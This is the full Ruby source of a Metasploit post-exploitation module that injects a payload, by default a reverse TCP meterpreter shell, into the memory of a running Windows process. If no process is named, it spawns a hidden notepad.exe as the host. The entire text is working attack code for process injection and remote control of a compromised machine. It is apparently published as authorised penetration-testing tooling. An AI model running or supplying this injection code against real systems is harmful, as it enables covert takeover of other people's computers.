## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection', 'Description' => %q{ This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'sinn3r' ], 'Platform' => [ 'win' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => "Oct 12 2011" )) register_options( [ OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) ], self.class) end # Run Method for when run command is issued def exploit @payload_name = datastore['PAYLOAD'] @payload_arch = framework.payloads.create(@payload_name).arch # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? pid = get_pid if not pid print_error("Unable to get a proper PID") return end inject_into_pid(pid) end # Figures out which PID to inject to def get_pid pid = datastore['PID'] if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) print_status("Launching notepad.exe...") pid = create_temp_proc end return pid end # Determines if a PID actually exists def has_pid?(pid) procs = [] begin procs = client.sys.process.processes rescue Rex::Post::Meterpreter::RequestError print_error("Unable to enumerate processes") return false end procs.each do |p| found_pid = p['pid'] return true if found_pid == pid end print_error("PID #{pid.to_s} does not actually exist.") return false end # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) # get the pid arch client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] vprint_status("Process found checking Architecture") if @payload_arch.first == p['arch'] vprint_good("Process is the same architecture as the payload") return true else print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") return false end end end end # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc() windir = client.sys.config.getenv('windir') # Select path of executable to run depending the architecture if @payload_arch.first== ARCH_X86 and client.arch == ARCH_X86 cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X64 cmd = "#{windir}\\System32\\notepad.exe" elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X86 cmd = "#{windir}\\Sysnative\\notepad.exe" elsif @payload_arch.first == ARCH_X86 and client.arch == ARCH_X64 cmd = "#{windir}\\SysWOW64\\notepad.exe" end begin proc = client.sys.process.execute(cmd, nil, {'Hidden' => true}) rescue Rex::Post::Meterpreter::RequestError return nil end return proc.pid end def inject_into_pid(pid) vprint_status("Performing Architecture Check") return if not arch_check(pid) begin print_status("Preparing '#{@payload_name}' for PID #{pid}") raw = payload.encoded execute_shellcode(raw, nil, pid) rescue Rex::Post::Meterpreter::RequestError => e print_error("Unable to inject payload:") print_line(e.to_s) end end end